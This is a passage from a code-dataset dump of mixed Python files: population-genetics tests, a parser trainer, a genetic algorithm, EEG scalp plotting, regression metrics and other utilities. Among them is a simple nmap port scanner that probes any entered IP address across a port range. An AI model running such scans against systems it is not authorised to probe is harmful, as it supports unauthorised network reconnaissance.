metadata[j][\"sex\"] = sexes[j]\n ims = tables.individuals.metadata_schema\n tables.individuals.packset_metadata(\n [ims.validate_and_encode_row(r) for r in metadata])\n pop_metadata = [p.metadata for p in tables.populations]\n for j, md in enumerate(pop_metadata):\n # nonWF models always have this\n md['sex_ratio'] = 0.0\n pms = tables.populations.metadata_schema\n tables.populations.packset_metadata(\n [pms.validate_and_encode_row(r) for r in pop_metadata])\n new_ts = pyslim.load_tables(tables)\n for j, ind in enumerate(new_ts.individuals()):\n md = ind.metadata\n assert md[\"sex\"] == sexes[j]\n self.verify_annotated_tables(new_ts, slim_ts)\n self.verify_annotated_trees(new_ts, slim_ts)\n self.verify_haplotype_equality(new_ts, slim_ts)\n # try loading this into SLiM\n loaded_ts = helper_functions.run_msprime_restart(new_ts, tmp_path, sex=\"A\")\n self.verify_trees_equal(new_ts, loaded_ts)\n\n def test_annotate_XY(self, helper_functions, tmp_path):\n random.seed(8)\n for ts in helper_functions.get_msprime_examples():\n for genome_type in [\"X\", \"Y\"]:\n slim_ts = pyslim.annotate_defaults(ts, model_type=\"nonWF\", slim_generation=1)\n tables = slim_ts.dump_tables()\n top_md = tables.metadata\n top_md['SLiM']['separate_sexes'] = True\n tables.metadata = top_md\n metadata = [ind.metadata for ind in tables.individuals]\n sexes = [random.choice([pyslim.INDIVIDUAL_TYPE_FEMALE, pyslim.INDIVIDUAL_TYPE_MALE])\n for _ in metadata]\n for j in range(len(metadata)):\n metadata[j][\"sex\"] = sexes[j]\n ims = tables.individuals.metadata_schema\n tables.individuals.packset_metadata(\n [ims.validate_and_encode_row(r) for r in metadata])\n node_metadata = [n.metadata for n in tables.nodes]\n for j in range(slim_ts.num_individuals):\n nodes = slim_ts.individual(j).nodes\n node_metadata[nodes[0]][\"genome_type\"] = pyslim.GENOME_TYPE_X\n node_metadata[nodes[0]][\"is_null\"] = (genome_type != \"X\")\n if sexes[j] == pyslim.INDIVIDUAL_TYPE_MALE:\n node_metadata[nodes[1]][\"genome_type\"] = pyslim.GENOME_TYPE_Y\n node_metadata[nodes[1]][\"is_null\"] = (genome_type != \"Y\")\n else:\n node_metadata[nodes[1]][\"genome_type\"] = pyslim.GENOME_TYPE_X\n node_metadata[nodes[1]][\"is_null\"] = (genome_type != \"X\")\n nms = tables.nodes.metadata_schema\n tables.nodes.packset_metadata(\n [nms.validate_and_encode_row(r) for r in node_metadata])\n pop_metadata = [p.metadata for p in tables.populations]\n for j, md in enumerate(pop_metadata):\n # nonWF models always have this\n md['sex_ratio'] = 0.0\n pms = tables.populations.metadata_schema\n tables.populations.packset_metadata(\n [pms.validate_and_encode_row(r) for r in pop_metadata])\n new_ts = pyslim.load_tables(tables)\n self.verify_annotated_tables(new_ts, slim_ts)\n self.verify_annotated_trees(new_ts, slim_ts)\n self.verify_haplotype_equality(new_ts, slim_ts)\n # try loading this into SLiM\n loaded_ts = helper_functions.run_msprime_restart(\n new_ts, tmp_path, sex=genome_type)\n self.verify_trees_equal(new_ts, loaded_ts)\n # these are *not* equal but only due to re-ordering of nodes and individuals\n # ... and for some reason, .subset( ) or .simplify( ) do not produce equality\n # self.assertTableCollectionsEqual(new_ts, loaded_ts,\n # skip_provenance=-1, reordered_individuals=True)\n\n def test_annotate_nodes(self, helper_functions):\n for ts in helper_functions.get_msprime_examples():\n slim_ts = pyslim.annotate_defaults(ts, model_type=\"nonWF\", slim_generation=1)\n tables = slim_ts.dump_tables()\n metadata = [n.metadata for n in tables.nodes]\n gtypes = [random.choice([pyslim.GENOME_TYPE_X, pyslim.GENOME_TYPE_Y])\n for _ in metadata]\n for md, g in zip(metadata, gtypes):\n if md is not None:\n md[\"genome_type\"] = g\n nms = tables.nodes.metadata_schema\n tables.nodes.packset_metadata(\n [nms.validate_and_encode_row(r) for r in metadata])\n new_ts = pyslim.load_tables(tables)\n for x, g in zip(new_ts.nodes(), gtypes):\n if x.metadata is not None:\n assert x.metadata[\"genome_type\"] == g\n # not testing SLiM because needs annotation of indivs to make sense\n\n def test_annotate_mutations(self, helper_functions):\n for ts in helper_functions.get_msprime_examples():\n slim_ts = pyslim.annotate_defaults(ts, model_type=\"nonWF\", slim_generation=1)\n tables = slim_ts.dump_tables()\n metadata = [m.metadata for m in tables.mutations]\n selcoefs = [random.uniform(0, 1) for _ in metadata]\n for j in range(len(metadata)):\n metadata[j]['mutation_list'][0][\"selection_coeff\"] = selcoefs[j]\n ms = tables.mutations.metadata_schema\n tables.mutations.packset_metadata(\n [ms.validate_and_encode_row(r) for r in metadata])\n new_ts = pyslim.load_tables(tables)\n for j, x in enumerate(new_ts.mutations()):\n md = x.metadata\n assert md['mutation_list'][0][\"selection_coeff\"] == selcoefs[j]\n\n def test_dont_annotate_mutations(self, helper_functions):\n # Test the option to not overwrite mutation annotations\n for ts in helper_functions.get_msprime_examples():\n ts = msprime.mutate(ts, rate=5, random_seed=3)\n assert ts.num_mutations > 0\n tables = ts.dump_tables()\n pre_mutations = tables.mutations.copy()\n pyslim.annotate_defaults_tables(tables, model_type=\"WF\",\n slim_generation=1, annotate_mutations=False)\n # this is necessary because b'' actually is decoded to\n # an empty mutation_list by the schema\n pre_mutations.metadata_schema = tables.mutations.metadata_schema\n assert tables.mutations == pre_mutations\n\n @pytest.mark.parametrize(\n 'restart_name, recipe', restarted_recipe_eq(\"no_op\"), indirect=[\"recipe\"])\n def test_reload_recapitate(\n self, restart_name, recipe, helper_functions, tmp_path\n ):\n # Test the ability of SLiM to load our files after recapitation.\n ts = recipe[\"ts\"]\n # recapitate, reload\n in_ts = pyslim.recapitate(ts, recombination_rate=1e-2, ancestral_Ne=10, random_seed=25)\n # put it through SLiM (which just reads in and writes out)\n out_ts = helper_functions.run_slim_restart(in_ts, restart_name, tmp_path)\n # check for equality, in everything but the last provenance\n in_ts.dump(\"in_ts.trees\")\n out_ts.dump(\"out_ts.trees\")\n self.verify_slim_restart_equality(in_ts, out_ts)\n\n @pytest.mark.parametrize(\n 'restart_name, recipe', restarted_recipe_eq(\"no_op\"), indirect=[\"recipe\"])\n def test_reload_annotate(\n self, restart_name, recipe, helper_functions, tmp_path\n ):\n # Test the ability of SLiM to load our files after annotation.\n ts = recipe[\"ts\"]\n tables = ts.dump_tables()\n metadata = [m.metadata for m in tables.mutations]\n has_nucleotides = tables.metadata['SLiM']['nucleotide_based']\n if has_nucleotides:\n nucs = [random.choice([0, 1, 2, 3]) for _ in metadata]\n refseq = \"\".join(random.choices(pyslim.NUCLEOTIDES,\n k = int(ts.sequence_length)))\n for n, md in zip(nucs, metadata):\n for m in md['mutation_list']:\n m[\"nucleotide\"] = n\n else:\n refseq = None\n for md in metadata:\n for m in md['mutation_list']:\n m[\"selection_coeff\"] = random.random()\n ms = tables.mutations.metadata_schema\n tables.mutations.packset_metadata(\n [ms.validate_and_encode_row(r) for r in metadata])\n in_ts = pyslim.load_tables(tables, reference_sequence=refseq)\n # put it through SLiM (which just reads in and writes out)\n out_ts = helper_functions.run_slim_restart(in_ts, restart_name, tmp_path)\n # check for equality, in everything but the last provenance\n self.verify_slim_restart_equality(in_ts, out_ts)\n\n\nclass TestReload(tests.PyslimTestCase):\n '''\n Tests for basic things related to reloading with SLiM\n '''\n @pytest.mark.parametrize(\n 'restart_name, recipe', restarted_recipe_eq(\"no_op\"), indirect=[\"recipe\"])\n def test_load_without_provenance(\n self, restart_name, recipe, helper_functions, tmp_path\n ):\n in_ts = recipe[\"ts\"]\n # with 0.5, SLiM should read info from metadata, not provenances\n in_tables = in_ts.dump_tables()\n in_tables.provenances.clear()\n in_tables.sort()\n cleared_ts = pyslim.SlimTreeSequence(\n in_tables.tree_sequence(),\n reference_sequence=in_ts.reference_sequence\n )\n out_ts = helper_functions.run_slim_restart(cleared_ts, restart_name, tmp_path)\n out_tables = out_ts.dump_tables()\n out_tables.provenances.clear()\n out_tables.sort()\n in_tables.assert_equals(out_tables)\n\n @pytest.mark.parametrize(\n 'restart_name, recipe', restarted_recipe_eq(\"no_op\", \"nucleotides\"), indirect=[\"recipe\"])\n def test_reload_reference_sequence(\n self, restart_name, recipe, helper_functions, tmp_path\n ):\n in_ts = recipe[\"ts\"]\n out_ts = helper_functions.run_slim_restart(in_ts, restart_name, tmp_path)\n assert in_ts.metadata['SLiM']['nucleotide_based'] is True\n assert out_ts.metadata['SLiM']['nucleotide_based'] is True\n assert in_ts.reference_sequence == out_ts.reference_sequence\n","sub_path":"tests/test_annotation.py","file_name":"test_annotation.py","file_ext":"py","file_size_in_byte":18773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"122345967","text":"\n\n#calss header\nclass _ABUTMENT():\n\tdef __init__(self,): \n\t\tself.name = \"ABUTMENT\"\n\t\tself.definitions = [u'a structure that is built to support an arch (= a curved top on two supports, that holds the weight of something above it), or the end of a bridge', u'the process of supporting something using an abutment']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_abutment.py","file_name":"_abutment.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"461845550","text":"from pyramid.response import Response\n\ndef groupfinder(userid, request):\n user = request.user\n if user and user.is_admin:\n return ['admin']\n elif user:\n return ['user']\n\ndef notfound(request):\n return Response(HTML_404)\n\nHTML_404 = \"\"\"\n\t\n\t\t\n\t\t\t

    \n\t\t\tPAGE NOT FOUND\n\t\t\n\t\n\"\"\"\n","sub_path":"alchemist/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"470939519","text":"from __future__ import print_function\n\nimport dynet_config\ndynet_config.set(mem=1024,random_seed=12345)\n\nimport sys\nimport random\nimport dynet as dy\nimport numpy as np\nfrom models import MLPParser, FIELDS\nfrom utils import DepTree, map_to_instances, read_conllu, read_index\n\ndef arc_loss(model, tree):\n h = model.transduce(tree.feats)\n scores = model.predict_arcs(h)\n loss = [hinge_loss(sc, tree.heads[dep]) for dep, sc in enumerate(scores)]\n return dy.esum(loss)\n\ndef label_loss(model, tree):\n h = model.transduce(tree.feats)\n scores = model.predict_labels(tree.heads, h)\n loss = [hinge_loss(sc, tree.labels[dep] - 1) for dep, sc in enumerate(scores)]\n return dy.esum(loss)\n\ndef hinge_loss(exprs, target, margin=1.0):\n scores = exprs.value()\n best_wrong = max([(i, sc) for i, sc in enumerate(scores) if i != target], key=lambda x: x[1])[0]\n if scores[target] < scores[best_wrong] + margin:\n return exprs[best_wrong] - exprs[target] + margin\n else:\n return dy.zeros(1)\n\ndef shuffled_stream(data):\n while True:\n random.shuffle(data)\n for d in data:\n yield d\n\ndef evaluate(model, validation_data):\n num_tokens = 0.\n correct_ua = correct_la = 0.\n\n model.disable_dropout()\n for i, gold in enumerate(validation_data):\n num_tokens += len(gold)\n parsed = model.parse(gold.feats)\n\n for n in range(len(gold)):\n if parsed.heads[n] == gold.heads[n]:\n correct_ua += 1.\n if parsed.labels[n] == gold.labels[n]:\n correct_la += 1.\n\n if (i % 100) == 0:\n print(\".\", end=\"\")\n sys.stdout.flush()\n model.enable_dropout()\n\n uas = correct_ua / num_tokens\n las = correct_la / num_tokens\n print(\"\\nUAS: {0:.4}, LAS: {1:.4}\".format(uas, las))\n\nif __name__ == \"__main__\":\n\n basename = \"../build/en\"\n index = read_index(basename)\n train_data = list(map_to_instances(read_conllu(\"../treebanks/train/en/en.conllu\"), index, FIELDS))\n\n pc = dy.ParameterCollection()\n model = MLPParser(pc, basename=\"../build/en\")\n model.enable_dropout()\n trainer = dy.AdamTrainer(pc)\n\n print(\"training sentences: {0}, tokens: {1}\".format(len(train_data), sum([len(tree) for tree in train_data])))\n\n batch_size = 50\n max_steps = 1000\n\n step = 0\n total_loss = 0\n batch_loss = []\n batch_tokens = 0\n\n dy.renew_cg()\n for tree in shuffled_stream(train_data):\n\n batch_loss.append(arc_loss(model, tree))\n batch_loss.append(label_loss(model, tree))\n\n batch_tokens += len(tree)\n if batch_tokens >= batch_size:\n loss = dy.esum(batch_loss) * (1.0 / batch_tokens)\n total_loss += loss.value()\n loss.backward()\n trainer.update()\n\n dy.renew_cg()\n batch_loss = []\n batch_tokens = 0\n step += 1\n\n if (step % 100) == 0:\n print(\".\", end=\"\")\n sys.stdout.flush()\n\n if (step % 1000) == 0:\n print(\"\\naverage loss: {0}\".format(total_loss / 1000))\n evaluate(model, train_data)\n total_loss = 0.0\n\n if step >= max_steps:\n break\n","sub_path":"src/dl4dp.py","file_name":"dl4dp.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"510607317","text":"from genetic.individuals import Individual\n\nimport heapq\nimport abc\nfrom typing import Sequence, List\nimport numpy as np\n\n\nclass AbstractEvolutionStrategy(metaclass=abc.ABCMeta):\n @abc.abstractmethod\n def crossover(self, individuals: Sequence[Individual], fitness: Sequence[float]) -> Sequence[Individual]:\n pass\n\n\nclass ElitismEvolution(AbstractEvolutionStrategy):\n def __init__(self, mutation_probability: float, elitism: int or bool):\n self.mutation_probability = mutation_probability\n self.elitism = int(elitism)\n\n @staticmethod\n def fitness2prob(fitness: Sequence[float]) -> Sequence[float]:\n probabilities = np.array(fitness)\n probabilities[np.isnan(probabilities)] = 0\n probabilities[probabilities < 0] = 0\n probabilities = probabilities / np.nansum(probabilities)\n return probabilities\n\n def get_elite(self, species: Sequence, fitness: Sequence[float]) -> List:\n if self.elitism == 0:\n return []\n\n best_species, _ = zip(*heapq.nlargest(self.elitism, zip(species, fitness), key=lambda x: x[1]))\n return list(best_species)\n\n def crossover(self, individuals: Sequence[Individual], fitness: Sequence[float]) -> Sequence[Individual]:\n number_of_species = len(individuals)\n\n probabilities = self.fitness2prob(fitness)\n\n new_generation = self.get_elite(individuals, probabilities)\n for i in range(number_of_species - len(new_generation)):\n new_specie = Individual.__add__(*np.random.choice(individuals, size=2, p=probabilities))\n\n new_specie.mutate(self.mutation_probability)\n\n new_generation.append(new_specie)\n\n return new_generation\n\n\nclass BasicEvolution(ElitismEvolution):\n def __init__(self, mutation_probability: float):\n super().__init__(mutation_probability, 0)\n","sub_path":"genetic/evolution_strategy.py","file_name":"evolution_strategy.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"422761874","text":"class Solution:\n def makeGood(self, s: str) -> str:\n stack = []\n for i in s:\n if stack and ((ord(stack[-1])-32) == ord(i) or (ord(stack[-1])+32) == ord(i)):\n stack.pop()\n else:\n stack.append(i)\n return ''.join(stack)\n\n\ns = \"leEeetcode\"\nres = Solution().makeGood(s)\nprint(res)","sub_path":"stack/1544_make_the_string_great/1544_make_the_string_great.py","file_name":"1544_make_the_string_great.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"510242136","text":"# Released under The MIT License (MIT)\n# http://opensource.org/licenses/MIT\n# Copyright (c) 2013 Martin Billinger\n\nimport numpy as np\nfrom scipy.interpolate import interp1d\n#noinspection PyPep8Naming\nimport matplotlib.pyplot as plot\n#noinspection PyPep8Naming\nimport matplotlib.path as path\n#noinspection PyPep8Naming\nimport matplotlib.patches as patches\nimport matplotlib.transforms as transforms\nfrom .projections import array_project_radial_to3d, project_radial_to2d\nfrom .geometry.euclidean import Vector\n\n\nclass Topoplot:\n \"\"\" Creates 2D scalp maps. \"\"\"\n\n def __init__(self, m=4, num_lterms=10, headcolor=[0, 0, 0, 1]):\n self.interprange = np.pi * 3 / 4\n self.head_radius = self.interprange\n self.nose_angle = 15\n self.nose_length = 0.12\n\n self.headcolor = headcolor\n\n verts = np.array([\n (1, 0),\n (1, 0.5535714285714286), (0.5535714285714286, 1), (0, 1),\n (-0.5535714285714286, 1), (-1, 0.5535714285714286), (-1, 0),\n (-1, -0.5535714285714286), (-0.5535714285714286, -1), (0, -1),\n (0.5535714285714286, -1), (1, -0.5535714285714286), (1, 0),\n ]) * self.interprange\n codes = [path.Path.MOVETO,\n path.Path.CURVE4, path.Path.CURVE4, path.Path.CURVE4,\n path.Path.CURVE4, path.Path.CURVE4, path.Path.CURVE4,\n path.Path.CURVE4, path.Path.CURVE4, path.Path.CURVE4,\n path.Path.CURVE4, path.Path.CURVE4, path.Path.CURVE4,\n ]\n self.path_head = path.Path(verts, codes)\n\n x = self.head_radius * np.cos((90.0 - self.nose_angle / 2) * np.pi / 180.0)\n y = self.head_radius * np.sin((90.0 - self.nose_angle / 2) * np.pi / 180.0)\n verts = np.array([(x, y), (0, self.head_radius * (1 + self.nose_length)), (-x, y)])\n codes = [path.Path.MOVETO, path.Path.LINETO, path.Path.LINETO]\n self.path_nose = path.Path(verts, codes)\n\n self.legendre_factors = self.calc_legendre_factors(m, num_lterms)\n\n self.locations = None\n self.g = None\n self.z = None\n self.c = None\n self.image = None\n\n self.g_map = {}\n\n @staticmethod\n def calc_legendre_factors(m, num_lterms):\n return [(2 * n + 1) / (n ** m * (n + 1) ** m * 4 * np.pi) for n in range(1, num_lterms + 1)]\n\n def calc_g(self, x):\n return np.polynomial.legendre.legval(x, self.legendre_factors)\n\n def set_locations(self, locations):\n n = len(locations)\n\n g = np.zeros((1 + n, 1 + n))\n g[:, 0] = np.ones(1 + n)\n g[-1, :] = np.ones(1 + n)\n g[-1, 0] = 0\n for i in range(n):\n for j in range(n):\n g[i, j + 1] = self.calc_g(np.dot(locations[i], locations[j]))\n\n self.locations = locations\n self.g = g\n\n def set_values(self, z):\n self.z = z\n self.c = np.linalg.solve(self.g, np.concatenate((z, [0])))\n\n def get_map(self):\n return self.image\n\n def set_map(self, img):\n self.image = img\n\n def calc_gmap(self, pixels):\n\n try:\n return self.g_map[pixels]\n except KeyError:\n pass\n\n x = np.linspace(-self.interprange, self.interprange, pixels)\n y = np.linspace(self.interprange, -self.interprange, pixels)\n\n xy = np.transpose(np.meshgrid(x, y))\n\n e = array_project_radial_to3d(xy)\n\n gmap = self.calc_g(e.dot(np.transpose(self.locations)))\n self.g_map[pixels] = gmap\n return gmap\n\n def create_map(self, pixels=32):\n gm = self.calc_gmap(pixels)\n self.image = gm.dot(self.c[1:]) + self.c[0]\n\n def plot_map(self, axes=None, crange=None, offset=(0,0)):\n if axes is None: axes = plot.gca()\n if crange is None:\n vru = np.nanmax(np.abs(self.image))\n vrl = -vru\n else:\n vrl, vru = crange\n head = self.path_head.deepcopy()\n head.vertices += offset\n return axes.imshow(self.image, vmin=vrl, vmax=vru, clip_path=(head, axes.transData),\n extent=(offset[0]-self.interprange, offset[0]+self.interprange,\n offset[1]-self.interprange, offset[1]+self.interprange))\n\n def plot_locations(self, axes=None, offset=(0,0)):\n if axes is None: axes = plot.gca()\n for p in self.locations:\n p2 = project_radial_to2d(Vector.fromiterable(p))\n axes.plot(p2.x+offset[0], p2.y+offset[1], 'k.')\n\n def plot_head(self, axes=None, offset=(0,0)):\n if axes is None: axes = plot.gca()\n head = self.path_head.deepcopy()\n nose = self.path_nose.deepcopy()\n head.vertices += offset\n nose.vertices += offset\n axes.add_patch(patches.PathPatch(head, facecolor='none', edgecolor=self.headcolor, lw=2))\n axes.add_patch(patches.PathPatch(nose, facecolor='none', edgecolor=self.headcolor, lw=2))\n\n def plot_circles(self, radius, axes=None, offset=(0,0)):\n if axes is None: axes = plot.gca()\n col = interp1d([-1, 0, 1], [[0, 1, 1], [0, 1, 0], [1, 1, 0]])\n for i in range(len(self.locations)):\n p3 = self.locations[i]\n p2 = project_radial_to2d(Vector.fromiterable(p3))\n circ = plot.Circle((p2.x+offset[0], p2.y+offset[1]), radius=radius, color=col(self.z[i]))\n axes.add_patch(circ)\n\n\ndef topoplot(values, locations, headcolor=[0, 0, 0, 1], axes=None, offset=(0, 0)):\n topo = Topoplot(headcolor=headcolor)\n topo.set_locations(locations)\n topo.set_values(values)\n topo.create_map()\n #h = topo.plot_map(axes, offset)\n topo.plot_map(axes=axes, offset=offset)\n topo.plot_locations(axes=axes, offset=offset)\n topo.plot_head(axes=axes, offset=offset)\n #plot.colorbar(h)\n return topo\n","sub_path":"eegtopo/topoplot.py","file_name":"topoplot.py","file_ext":"py","file_size_in_byte":5794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"96112672","text":"\"\"\" Text to Speach \"\"\"\n\"\"\" Environment: talk_program \"\"\"\n\nimport io\nimport pygame\nfrom gtts import gTTS\n\ndef speak(text_to_speak):\n with io.BytesIO() as file:\n gTTS(text=text_to_speak, lang='en').write_to_fp(file)\n file.seek(0)\n pygame.mixer.init()\n pygame.mixer.music.load(file)\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n continue\n\nif __name__ == \"__main__\":\n text = str(input(\"What would like me to say?: \"))\n speak(text)\n \n","sub_path":"TextToSpeech.py","file_name":"TextToSpeech.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"213559765","text":"\r\nimport nmap\r\nimport ipaddress\r\nimport re\r\n\r\nport_range_pattern = re.compile(\"([0-9]+)-([0-9]+)\")\r\nport_min = 0\r\nport_max = 65535\r\n\r\n\r\nprint(r\"\"\" ____ ___ \r\n\\ \\ / / | (_)\\ | _ \\\r\n \\ \\ ____ / / | ___| || \\ \\\r\n \\ \\ / /\\ \\ / / | | || | | \r\n \\ \\ / / \\ \\ / / | | ||_/ /\r\n \\_\\_/_/ \\_\\_/_/ |_| |___/\"\"\")\r\nprint(\"\\n****************************************************************\")\r\nprint(\"\\n* Copyright of WPD, 2021 *\")\r\nprint(\"\\n****************************************************************\")\r\n\r\nwhile True:\r\n ip_add_entered = input(\"\\nPlease enter the ip address that you want to scan: \")\r\n try:\r\n ip_address_obj = ipaddress.ip_address(ip_add_entered)\r\n print(\"You entered a valid ip address.\")\r\n break\r\n except:\r\n print(\"You entered an invalid ip address\")\r\n\r\n\r\nwhile True:\r\n print(\"Please enter the range of ports you want to scan in format: - (ex would be 60-120)\")\r\n port_range = input(\"Enter port range: \")\r\n port_range_valid = port_range_pattern.search(port_range.replace(\" \",\"\"))\r\n if port_range_valid:\r\n port_min = int(port_range_valid.group(1))\r\n port_max = int(port_range_valid.group(2))\r\n break\r\n\r\nnm = nmap.PortScanner()\r\nfor port in range(port_min, port_max + 1):\r\n try:\r\n result = nm.scan(ip_add_entered, str(port))\r\n port_status = (result['scan'][ip_add_entered]['tcp'][port]['state'])\r\n print(f\"Port {port} is {port_status}\")\r\n except:\r\n print(f\"Cannot scan port {port}.\")\r\n","sub_path":"nmap_port_scanner_ip_obj.py","file_name":"nmap_port_scanner_ip_obj.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"347789295","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:赵鑫\n\n# python实现矩阵分解\n\nimport numpy as np\nfrom Decomposition.ModifiedGramSchmidt import ModifiedGramSchmidt\nfrom Decomposition.LU import LU\nfrom Decomposition.Householder import Householder\nfrom Decomposition.Givens import Givens\n\n\ndef main(np_array, type='GS'):\n \"\"\"Matrix decomposition on numpy square array.\n\n Args:\n np_array: a numpy array of shape n × n.\n type:\n 'LU': LU decomposition method;\n 'GS'(default): Modified Gram Schmidt orthogonalization method;\n 'HO': Householder reduction method;\n 'GI': Givens reduction method;\n\n Returns:\n a tuple contains two numpy square arrays\n of Matrix decomposition result\n \"\"\"\n\n if type == 'LU':\n return LU(np_array)\n if type == 'GS':\n return ModifiedGramSchmidt(np_array)\n if type == 'HO':\n return Householder(np_array)\n if type == 'GI':\n return Givens(np_array)\n\n return ModifiedGramSchmidt(np_array)\n\n\ndef test():\n '''Expect result:\n L = [[1., 0., 0.], U = [[1., 4., 5.],\n [4., 1., 0.], [0., 2., 6.],\n [3., 2., 1.]] [0., 0., 3.]]\n '''\n np_array = np.array([[1., 4., 5.],\n [4., 18., 26.],\n [3., 16., 30.]])\n\n print(\"LU Decomposition:\")\n for _ in main(np_array, 'LU'):\n print(_)\n print(\"*****************************************************\\n\")\n\n '''Expect result:\n Q = (1/15)[[ 5., 14., -2.], R = [[3., 15., 0.],\n [-10., 5., 10.], [0., 15., -30.],\n [ 10., -2., 11.]] [0., 0., 45.]]\n '''\n np_array = np.array([[1., 19., -34.],\n [-2., -5., 20.],\n [2., 8., 37.]])\n\n type_set = ('GS', 'HO', 'GI')\n for type in type_set:\n print(type, \"Decomposition:\")\n for _ in main(np_array, type):\n print(_)\n print(\"*****************************************************\\n\")\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"270734975","text":"import numpy as np\nimport pandas as pd\n\n__all__ = ['normal_loss', 'mean_absolute_error', 'mean_squared_error',\n 'mean_absolute_percentage_error', 'hinge', 'explained_variance_score',\n 'median_absolute_error', 'r2_score', 'regression_report']\n\ndef normal_loss(y_true, y_pred, k, log=False, root=False):\n \"\"\"Mean normal error regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n k: int, loss = np.sqrt(loss, 1/k).\n log: default False, whether to log the variable.\n root: default False, whether to sqrt the variable, if True, return rmse loss.\n Returns:\n regression loss values.\n \"\"\"\n if log:\n loss = (np.log1p(y_true)-np.log1p(y_pred)).abs().pow(k).mean()\n else:\n loss = (y_true-y_pred).abs().pow(k).mean()\n if root:\n loss = np.sqrt(loss, 1/k)\n return loss\n\ndef mean_absolute_error(y_true, y_pred, log=False):\n \"\"\"Mean absolute error regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n log: default False, whether to log the variable.\n Returns:\n regression loss values.\n \"\"\"\n return normal_loss(y_true, y_pred, k=1, log=log, root=False)\n\ndef mean_squared_error(y_true, y_pred, log=False, root=False):\n \"\"\"Mean squared error regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n log: default False, whether to log the variable.\n root: default False, whether to sqrt the variable, if True, return rmse loss.\n Returns:\n regression loss values.\n \"\"\"\n return normal_loss(y_true, y_pred, k=2, log=log, root=root)\n\ndef mean_absolute_percentage_error(y_true, y_pred):\n \"\"\"Mean absolute percentage error regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n Returns:\n regression loss values.\n \"\"\"\n return ((y_true-y_pred)/y_true).abs().mean()\n\ndef hinge(y_true, y_pred, k=1):\n \"\"\"hinge regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n k: int, pow() function dim.\n Returns:\n regression loss values.\n \"\"\"\n return (1-y_true*y_pred).clip(lower=0).pow(k).mean()\n\ndef explained_variance_score(y_true, y_pred):\n \"\"\"explained variance regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n Returns:\n regression loss values.\n \"\"\"\n return 1-(y_true-y_pred).std()**2/y_true.std()**2\n\ndef median_absolute_error(y_true, y_pred):\n \"\"\"Median absolute error regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n Returns:\n regression loss values.\n \"\"\"\n return (y_true-y_pred).abs().median()\n\ndef r2_score(y_true, y_pred):\n \"\"\"r2 regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n Returns:\n regression loss values.\n \"\"\"\n return 1-(y_true-y_pred).pow(2).sum()/(y_true-y_true.mean()).pow(2).sum()\n\ndef regression_report(y_true, y_pred, printable=False, printinfo='Regression Report'):\n \"\"\"\n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted labels.\n Returns:\n regression report.\n \"\"\"\n result = {'mean_absolute_error':mean_absolute_error(y_true, y_pred),\n 'mean_squared_error':mean_squared_error(y_true, y_pred),\n 'mean_absolute_percentage_error':mean_absolute_percentage_error(y_true, y_pred),\n 'hinge_loss':hinge(y_true, y_pred),\n 'explained_variance_score':explained_variance_score(y_true, y_pred),\n 'median_absolute_error':median_absolute_error(y_true, y_pred),\n 'r2_score':r2_score(y_true, y_pred)\n }\n if printable:\n print(\"\\n{}\".format(printinfo))\n print(\"mean_absolute_error: %.4f\" % result['mean_absolute_error'])\n print(\"mean_squared_error: %.4f\" % result['mean_squared_error'])\n print(\"mean_absolute_percentage_error: %.4f\" % result['mean_absolute_percentage_error'])\n print(\"hinge_loss: %.4f\" % result['hinge_loss'])\n print(\"explained_variance_score: %.4f\" % result['explained_variance_score'])\n print(\"median_absolute_error: %.4f\" % result['median_absolute_error'])\n print(\"r2_score: %.4f\" % result['r2_score'])\n return result\n","sub_path":"linora/metrics/_regression.py","file_name":"_regression.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"172713281","text":"# !/usr/bin/python3\n\nfrom urllib.parse import urlparse\nfrom bitstring import BitArray\nimport 